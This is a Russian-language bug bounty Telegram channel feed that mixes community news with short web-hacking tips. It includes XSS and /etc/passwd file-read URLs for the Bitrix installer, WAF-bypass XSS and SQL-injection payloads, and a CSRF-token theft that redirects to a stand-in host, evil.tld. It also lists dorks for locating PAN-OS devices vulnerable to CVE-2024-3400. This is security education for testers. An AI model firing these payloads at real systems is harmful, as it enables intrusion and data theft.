Многие из нас видели в кино кулхацкеров способных в пару кликов взломать любую систему. Вдобавок к этому сцены взлома сопровождаются звуковыми и визуальными эффектами, которые вызывают если не смех, то ироническую улыбку у всех, кто в теме.
В статье на Хабре автор решил развеять миф о всесильности хакеров и объяснить, как этот миф мешает внедрению культуры кибербезопасности в компаниях.
Ссылка на Habr
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
Как киношные хакеры испортили жизнь ИБ-специалистам
Хакеры в кино — сверхлюди, которые по щелчку мыши могут взломать автомобиль, запустить «киберракету» и вычислить юрлицо через командную строку. Сцены взлома сопровождаются звуковыми и визуальными...
👍12🔥6
Неоднократно сталкивался с подобным кейсом в различных компаниях:
Но как можно повысить импакт?
#web #logic #ato
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥33👍6🤔1
Наткнулся на пост, где автор вдохновился исследованием HTTP Request Splitting от @blackfan и решил накидать скрипт для детекта некоторых представленных там уязвимостей.
Подробнее про работу скрипта рассказано тут а сам код доступен на GitHub. А на скрине сверху, уже другой исследователь запилил шаблон для Bcheck, чтобы детектить это в Burp Suite.
Для эксплуатации уязвимой конечной точки можете обратиться к данному исследованию и помните, чтобы иметь хороший рабочий PoC при отправке - демонстрируйте импакт, а не уязвимость.
#web #crlf
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17
Forwarded from PurpleBear (Vadim Shelest)
Две недели назад вышел новый релиз Nuclei v3.2.0 от
В новой версии добавили расширенную функциональность сканов с учетными данными, поддерживающую различные схемы аутентификации
Authentication Types:
✅ Static Authentication - статичные креды (username и password) для
✅ Dynamic Authentication -
В следующих релизах авторы планируют также добавить интеграцию с
Project Discovery. В новой версии добавили расширенную функциональность сканов с учетными данными, поддерживающую различные схемы аутентификации
nuclei -u http://example.com/ -secret-file example_auth.yaml
Authentication Types:
✅ Static Authentication - статичные креды (username и password) для
Basic Auth, API Key, Bearer Token, Custom Header, Cookie✅ Dynamic Authentication -
OAuth2.0, когда статичные креды (username и password) используются для получения Session Tokens/Cookie, Custom HeaderSecret file содержит учетные данные для аутентификации для ресурсов по совпадению значений domains и domains-regex, без необходимости изменять уже существующие шаблоныstatic:
# 1. Basic Auth based auth
- type: basicauth
domains:
- scanme.sh
username: test
password: test
# 2. Bearer Token based auth
- type: bearertoken
domains-regex:
- .*scanme.sh
- .*example.com
token: test
dynamic:
- template: /path/to/wordpress-login.yaml
variables:
- name: username
value: test
- name: password
value: test
type: cookie
domains:
- blog.example.com
cookies:
- raw: "{{wp-global-cookie}}"
- raw: "{{wp-admin-cookie}}"
- raw: "{{wp-plugin-cookie}}"
В следующих релизах авторы планируют также добавить интеграцию с
HashiCorp Vault, AWS Secrets Manager и 1PasswordProjectDiscovery
Scanning Login-Protected Targets with Nuclei v3.2 — ProjectDiscovery Blog
With the release of Nuclei v3.2.0, we've introduced a more powerful and versatile approach to conducting authenticated scans. Previously, authentication headers were primarily included using the -H flag, a method that had its limitations. The introduction…
👍12
Не все знают, но если на сайте есть open redirect и client side path traversal вы можете воровать заголовок с CSRF токеном через CORS запрос.
Например, если приложение через
fetch() добавляет заголовок csrfToken при обращении к /api/user, то с помощью path traversal и open redirect'а мы можем похитить заголовок, отправив жертву на /api/user/../redirect?to=evil.tld/corsAllowЕще больше практических примеров использования path traversal на стороне клиента вы можете узнать из статей, представленных ниже:
➖Practical Example Of Client Side Path Manipulation
➖From an Innocent Client-Side Path Traversal to Account Takeover
➖Client-side path traversal vulnerability class explained - $6,580 GitLab bug bounty
➖Practical Client Side Path Traversal Attacks
➖The power of Client-Side Path Traversal: How I found and escalated 2 bugs through "../"
#web #cspt
Please open Telegram to view this post
VIEW IN TELEGRAM
👍22🔥4
Топ немецкого багбаунти @Valyaroller наконец представил первый выпуск своего подкаста на русском языке. Всем багхантерам, пентестерам и тем, кто в теме рекомендую к просмотру! Поддержите лайками, подписками и полезным фидбеком!
Ссылка на YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Алексей Синцов - путь от исследователя до директора по безопасности (Ep.1)
В нашем первом выпуске Responsible Disclosure Podcast мы решили пригласить человека, который имеет опыт в cyber security более 20 лет. Алексей закончил Санкт-Петербургский государственный политехнический университет по специальности "Информационная безопасность…
🔥17👍2🤔1
Forwarded from MavisGPT
С двух ног врываюсь в фаззинг/экплоит дев браузеров. сразу получеными двумя CVE(UXSS и Adress Bar Spofing) и футболкой по почте. На самом деле потребовалось полтора года на попытки и освоение движка V8, и умение фаззить. А оказалось достаточно все просто, с нуля написать фаззер, благо если знаешь теория пишется быстро, выставление санитайзероми и https://github.com/YulinSec/ChatGPTScanner как проверка на действительно полезные вылеты программ. Наконец нормально рабочие примение LLM в ИБ. Схема проста, фаззер фаззит, дает тебе вылеты, тот скрипт проверяет на ценность вылетов, при легком изменение кода сам пишет poc. Тебе только проверять на действительные ценные poc.
В частности следующий апдейт хрома будет из за меня, так что извините.
PS? Этот канал был создан что бы выкладывать свои пет проекты/идеи которые всплывают в голове.
В частности следующий апдейт хрома будет из за меня, так что извините.
PS? Этот канал был создан что бы выкладывать свои пет проекты/идеи которые всплывают в голове.
🔥32👍4
MavisGPT
С двух ног врываюсь в фаззинг/экплоит дев браузеров. сразу получеными двумя CVE(UXSS и Adress Bar Spofing) и футболкой по почте. На самом деле потребовалось полтора года на попытки и освоение движка V8, и умение фаззить. А оказалось достаточно все просто…
Поздравляем @b4bk4 с похеком хрома и двумя CVE)
🔥27🤯5👍4😢1
На пентестах внешнего периметра не всегда сразу доступен полный скоуп IP-адресов, доменов и поддоменов. В таких случаях приходится recon-ить все ресурсы компании самостоятельно. Зачастую компании сами не подозревают, какие ресурсы у них могут «торчать наружу».
Аналогичная ситуация ждет вас и на багбаунти, когда у программы широкий скоуп и грамотная разведка и сбор ресурсов компании может помочь найти вам то, что не нашли другие.
Из статьи ниже вы поймете на практическом примере как производить сбор IP-адресов заказчика, а также проводить горизонтальный и вертикальный поиск доменов.
Читать статью
#web #recon
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
Увеличиваем Attack Surface на пентесте периметра
Сгенерировано нейросетью DALL-E Привет, Хабр! Типичная проблема: компании часто сами не подозревают, какие ресурсы у них могут «торчать наружу». А раз их может нарыть потенциальный злоумышленник...
👍15🔥2
Forwarded from HaHacking
Манипуляция
Content-Type для эксплуатации некорректного парсинга и, следовательно, для обхода WAF, внедрения полезной нагрузки для XSS и проведения CSRF;Базовый пример идеи из репозитория:
Content-Type:application/x-www-form-urlencoded
Body:q=' union select '1➡️ App:' union select 1'➡️ WAF:' union select 1'
Content-Type:application/json
Body:{"q":"' \u0075nion \u0073elect '1"}➡️ App:' union select 1'➡️ WAF:' union select 1'
Content-Type:application/x-www-form-urlencoded;/json
Body:{"q":"' \u0075nion \u0073elect '1"}➡️ App:' union select 1'➡️ WAF:{"q":"' \u0075nion \u0073elect '1"}
Content-Type, которые могут быть использованы для внедрения полезной нагрузки для эксплуатации XSS;Content-Type, которые могут быть использованы для cross-origin запросов в зависимости от браузера;// Подобное от PortSwigger: XSS/Cheat-Sheet#Prototype Pollution
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12🔥6
Для установки Битрикса есть скрипт
bitrixsetup.php, который разработчики рекомендуют удалять после установки, но, как выяснилось, не все это делают. При обнаружении этого скрипта основной вектор атаки, который приходит в голову, это переустановить CMS и загрузить веб-шелл через административную панель.Иногда админы просто ограничивают права на запись в директорию и считают, что этого будет достаточно, однако данный скрипт сам по себе оказался уязвим к XSS и LFR:
XSS:
https://target.com/bitrixsetup.php?action=UNPACK&filename=<img src='' onerror=alert(document.domain)>
LFR:
https://target.com/bitrixsetup.php?action=UNPACK&filename=../../../../etc/passwd
Более подробно читайте в статье на хабре.
#web #bitrix #xss #lfr
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
Удалить нельзя эксплуатировать: как мы нашли уязвимость в установщике Битрикс
Источник: https://www.reddit.com/r/LofiGirl/comments/ipf71o/lo_fi_romanian_programmer_i_created_for_rromania/ Методология тестирования на проникновение предполагает разделение поиска уязвимостей на...
👍21🔥9
Особое внимание стоит обратить на следующую информацию:
➖ Собственный бот, который проверит Ваш файл 70 антивирусами одновременно.
➖ Наш репозиторий с подборкой материала для изучения компьютерных сетей.
➖ Коллекция инструментов и ресурсов для поиска информации о человеке в 2024 году.
➖ Актуальные методы социальной инженерии и профайлинга.
➖ Бесплатные курсы для изучения ИБ и OSINT.
Вас ждёт только актуальный и качественный материал. @S.E.
Please open Telegram to view this post
VIEW IN TELEGRAM
😁2🤔2👍1🤯1
Тем временем, число подписчиков на канале перевалило за 10к! Спасибо всем за то, что читаете, шарите посты по другим каналам и чатикам, а также делитесь фидбеком и интересными находками, вы крутые!❤️
Please open Telegram to view this post
VIEW IN TELEGRAM
❤43👍7🔥7
Статья по байпассу средств защиты от XSS для некоторых кейсов. Как итог, получаем несколько довольно универсальных пэйлодов, которые могут пригодится вам и в других случаях (мне пригодились):
Imperva & Incapsula:
<details/open/id="""ontoggle=[JS]>
Amazon Cloudfront<details/open/id="""ontoggle=[JS]>
Akamai<details open id="' "'"ontoggle=[JS]>
Еще больше байпассов для XSS доступно в репозитории на GitHub.
#web #xss #waf #bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
👍25🔥6
Forwarded from Поросёнок Пётр
В нашем новом выпуске мы пригласили человека из мира мобильного багхантинга, активного участника форума Antichat, и автора проекта reFlutter. Его история вызывает восхищение и уважение 🦾
https://youtu.be/2KCSxYQ543M
https://youtu.be/2KCSxYQ543M
YouTube
Филипп (Impact) Никифоров - 500к в месяц на bug bounty, автор reFlutter и программист (Ep. 2)
Наш очередной гость – автор канала https://xn--r1a.website/postImpact , разработчик, багхантер и просто классный человек. Мы постарались поговорить о его увлекательном пути в сфере безопасности, активностях на Antichat, реверсе и поиске мобильных багов.
Тайм-коды:…
Тайм-коды:…
🔥9👍3❤1
Forwarded from Пост Импакта
Спасибо @ValyaRoller за приглашение на подкаст! Подписывайтесь на его замечательный канал @pigPeter
Кому интересен кейс с paypal, тут подробнее можно почитать: t.me/postImpact/6
такой же кейс все еще работает с TripAdvisor так что можете счейнить до high с любой xss на поддоменах:
Вообще многие сдают не раскручивая — сдают medium вместо high теряя значительное bounty.
Еще кейс с dyson не попал в видео, там я рассказывал про то что у них одна тестовая репа попала в публичный bitbucket (всего на пару часов), а там был логин/пароль QA. И пароль подходил к его рабочему outlook , внутреннему bitbucket и slack. Как итог - доступ к главному домену dyson.com и сорцам. Так что нужны второй фактор и еще фингерпиринты к браузерам/ip.
про мою первую багу в ICQ, на самом деле 150$ (отчет оказался частично раскрытым) — https://hackerone.com/reports/373909
Кому интересен кейс с paypal, тут подробнее можно почитать: t.me/postImpact/6
такой же кейс все еще работает с TripAdvisor так что можете счейнить до high с любой xss на поддоменах:
Pattern.compile("^(?:https?\\:\\/\\/(?:[A-Za-z0-9_\\-]+\\.(dhcp(\\-[A-Za-z]+)?\\.([A-Za-z0-9_\\-]+\\.corp\\.)?|(nw\\.)?dev(\\-[A-Za-z]+)?\\.|cmc\\.|d\\.)?)?tripadvisor\\.(?:com|(?:[a-z]{2})|(?:(?:co|com)\\.[a-z]{2})))?\\/.*$");Вообще многие сдают не раскручивая — сдают medium вместо high теряя значительное bounty.
Еще кейс с dyson не попал в видео, там я рассказывал про то что у них одна тестовая репа попала в публичный bitbucket (всего на пару часов), а там был логин/пароль QA. И пароль подходил к его рабочему outlook , внутреннему bitbucket и slack. Как итог - доступ к главному домену dyson.com и сорцам. Так что нужны второй фактор и еще фингерпиринты к браузерам/ip.
про мою первую багу в ICQ, на самом деле 150$ (отчет оказался частично раскрытым) — https://hackerone.com/reports/373909
👍8🔥2❤1
Уязвимость выполнения команд (CVE-2024-3400), затрагивает функцию GlobalProtect в нескольких последних версиях PAN-OS - программного обеспечения, которое работает на большинстве современных устройств брандмауэра Palo Alto Networks.
GlobalProtect - это функция VPN PAN-OS, что приводит к наличию множества уязвимых устройств подключенных к Интернету. Подробный анализ читайте по ссылке.
Дорк Shodan:
http.html_hash:-1303565546Дорк Censys:
services.http.response.body_hash="sha1:28f1cf539f855fff3400f6199f8912908f51e1e1Дорк Fofa:
icon_hash="-631559155"Дорк Zoomeye
app:"Palo Alto Networks firewall httpd"Дорк Hunter.how
product.name="GlobalProtect Portal"Ссылка на PoC
Ссылка на шаблон Nuclei
#web #rce #dork #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
AttackerKB
CVE-2024-3400 | AttackerKB
A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS…
👍15
Forwarded from S.E.Reborn
• Очень информативное руководство по Bug Bounty, которое содержит полезные инструменты, лабы, ресерчи, кейсы из жизни и еще очень много полезных ссылок.
#BB
Please open Telegram to view this post
VIEW IN TELEGRAM
Security Breached Blog
Bug Bounty Blueprint: A Beginner's Guide
This guide is a must-read for beginners to dive into Bug Bounty Hunting. It provides foundational skills, tips, tools, and resources for Bug Bounty Hunters. I've covered various aspects including vulnerabilities and learning resources. Are you ready to embark…
🔥11👍4
Forwarded from Path Secure (CuriV)
Привет!
Я проводил множество собесов для админов и пентестеров, менторил несколько человек по разным аспектам наступательной информационной безопасности, сам участвовал в собесах. Мне нравится как разные вопросы позволяют пролить свет на глубину знаний человека в той или иной области.
Решил создать и курировать репозиторий с вопросами по наступательной безопасности на русском языке. Почему-то я не нашел такой репозиторий сразу. На английском языке таких огромное колличество и все они имею свои плюсы и минусы.
Этот репозиторий содержит в себе компиляцию вопросов по наступательной безопасности (offensive security). Используя этот материал, можно подготовиться к предстоящему собеседованию или прикинуть какие области знаний Вами не покрыты для самостоятельного обучения. Хороший интервьюер всегда задаст более глубокий и уточняющий вопрос, а соискателю будет невероятно полезно осознавать что еще ему стоит подучить или хотя бы иметь ввиду.
Проект является личной инициативой и несет в себе исключительно альтруистические цели. Проект является открытым, каждый желающий может сделать форк или предложить изменения в существующий список вопросов мне в личку в телеге (@curiv). Порядок вопросов и их категория носят субъективный характер. Репозиторий будет наполняться с течением времени, список источников представлен в последнем разделе. Вопросы будут агрегироваться из источников, список источников также будет пополняться. Если оставите положительные реакции, то мне будет приятно ❤️
https://github.com/curiv/russian-offensive-security-questions
#pentest #interview #repository
Я проводил множество собесов для админов и пентестеров, менторил несколько человек по разным аспектам наступательной информационной безопасности, сам участвовал в собесах. Мне нравится как разные вопросы позволяют пролить свет на глубину знаний человека в той или иной области.
Решил создать и курировать репозиторий с вопросами по наступательной безопасности на русском языке. Почему-то я не нашел такой репозиторий сразу. На английском языке таких огромное колличество и все они имею свои плюсы и минусы.
Этот репозиторий содержит в себе компиляцию вопросов по наступательной безопасности (offensive security). Используя этот материал, можно подготовиться к предстоящему собеседованию или прикинуть какие области знаний Вами не покрыты для самостоятельного обучения. Хороший интервьюер всегда задаст более глубокий и уточняющий вопрос, а соискателю будет невероятно полезно осознавать что еще ему стоит подучить или хотя бы иметь ввиду.
Проект является личной инициативой и несет в себе исключительно альтруистические цели. Проект является открытым, каждый желающий может сделать форк или предложить изменения в существующий список вопросов мне в личку в телеге (@curiv). Порядок вопросов и их категория носят субъективный характер. Репозиторий будет наполняться с течением времени, список источников представлен в последнем разделе. Вопросы будут агрегироваться из источников, список источников также будет пополняться. Если оставите положительные реакции, то мне будет приятно ❤️
https://github.com/curiv/russian-offensive-security-questions
#pentest #interview #repository
GitHub
GitHub - curiv/russian-offensive-security-questions: Репозиторий содержит список вопросов по наступальной безопасности.
Репозиторий содержит список вопросов по наступальной безопасности. - GitHub - curiv/russian-offensive-security-questions: Репозиторий содержит список вопросов по наступальной безопасности.
👍21❤4🔥4😁1
Увлекательное кейс-исследование, где авторам удалось превратить простой, на первый взгляд, DOM XSS в изощренный захват аккаунта в один клик. В статье рассказано о мыслительном процессе, преградах, с которыми пришлось столкнуться, и о том, как их преодолеть, чтобы получить полностью рабочий эксплойт.
Читать статью
#web #xss #ato
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
Как мы превратили DOM XSS в изощренный захват аккаунта в один клик, оцененный в $8000
I. Введение Сегодня мы с вами погрузимся в увлекательное кейс-исследование, где удалось превратить простой, на первый взгляд, DOM XSS в изощренный захват аккаунта в один клик. Эта атака позволяет злоумышленнику отправить легитимную ссылку для входа из электронной…
🔥28🤯7👍2